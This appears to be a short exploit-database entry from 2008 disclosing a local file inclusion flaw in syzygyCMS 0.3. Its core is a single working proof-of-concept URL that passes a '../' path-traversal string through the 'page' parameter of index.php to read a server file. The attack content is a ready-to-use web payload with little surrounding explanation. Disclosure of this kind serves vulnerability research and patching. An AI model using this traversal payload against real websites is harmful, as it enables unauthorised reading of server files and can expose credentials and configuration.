id: 3503
date: 08/02/2008
title: syzygyCMS 0.3 (index.php page) Local File Inclusion Vulnerability
author: SirGod
cves: 

=================================================================
syzygyCMS 0.3 (index.php page) Local File Inclusion Vulnerability
=================================================================



######################################
[+] syzygyCMS 0.3 Local File Inclusion    
[+] Discovered By SirGod                                                
[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin
[+] also ToxicBlood,MesSiAH,xZu
######################################

Example :

http://localhost/x/index.php?page=../../../autoexec.bat

This will open autoexec.bat .

###########################################



#  0day.today [2023-03-27]  #